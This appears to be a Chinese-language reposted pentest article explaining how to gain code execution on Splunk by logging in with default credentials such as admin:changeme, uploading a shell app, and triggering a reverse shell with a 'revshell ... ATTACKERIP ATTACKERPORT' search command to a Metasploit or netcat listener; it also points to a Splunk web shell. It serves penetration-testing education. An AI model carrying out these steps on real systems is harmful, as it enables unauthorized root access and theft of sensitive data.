在Splunk上如何安裝自定義應用反彈Shell

這篇文章主要介紹了在Splunk上如何安裝自定義應用反彈Shell，具有一定借鑒價值，感興趣的朋友可以參考下，希望大家閱讀完這篇文章之后大有收獲，下面讓小編帶著大家一起了解一下。

前言

每次測試時我都會碰到Splunk。Splunk是一個用于搜索，分析和可視化數據的軟件平臺。通常，Splunk中都會包含著各種數據，其中一些可能是較為敏感的數據。因此，對于滲透測試人員而言它的價值不言而喻。

想要獲得對Splunk的訪問權限，可以通過猜密碼或重用之前獲取到的密碼嘗試登錄。曾經，我有過使用“admin:admin”或“admin:changeme”登錄進入管理控制臺的情況。

Splunk app

有一個技巧我相信很多人都不知道，就是使用Splunk app來執行python代碼。TBG Security團隊開發了一款可用于滲透測試的Splunk app。該應用早在2017年就已經推出。盡管如此，我覺得還是很少有人知道這個工具，我覺得它應該受到更多人的關注。

工具的使用非常簡單。首先，你只需從Splunk Shells GitHub頁面下載其最新版本。

登錄Splunk管理控制臺后，依次單擊“App”欄和“Manage Apps”。

進入Apps面板后，單擊“Install app from file”。

單擊browse按鈕并上傳tar.gz文件。

應用成功上傳后，必須重啟Splunk。重啟后登錄Splunk，并返回到“Apps”界面。單擊permissions，當你看到“Sharing”選項時，單擊“All Apps”單選按鈕。

安裝app后，最后要做的就是獲取shell。這里會有一些選項，我選擇的是通過Metasploit創建的標準反向shell。

MSF handler（或netcat listener）啟動并運行后，鍵入以下命令觸發app：

| revshell SHELLTYPE ATTACKERIP ATTACKERPORT

這將立即執行app，并獲取到一個反向shell。

以上測試是在Splunk 7.0上進行的，一切都非常的順利！Splunk通常以root身份運行，這為攻擊者提供了枚舉主機其他信息的機會，而不僅僅是局限在數據庫范圍。

更新：

除了以上方法，你還可以使用Tevora的splunk_pentest_app，更多內容可以參閱他們發布的文章。

再次更新（10/20/2018）：

我發現了一個可用的Splunk web shell：https://github.com/f8al/TA-Shell。

感謝你能夠認真閱讀完這篇文章，希望小編分享的“在Splunk上如何安裝自定義應用反彈Shell”這篇文章對大家有幫助，同時也希望大家多多支持億速云，關注億速云行業資訊頻道，更多相關知識等著你來學習!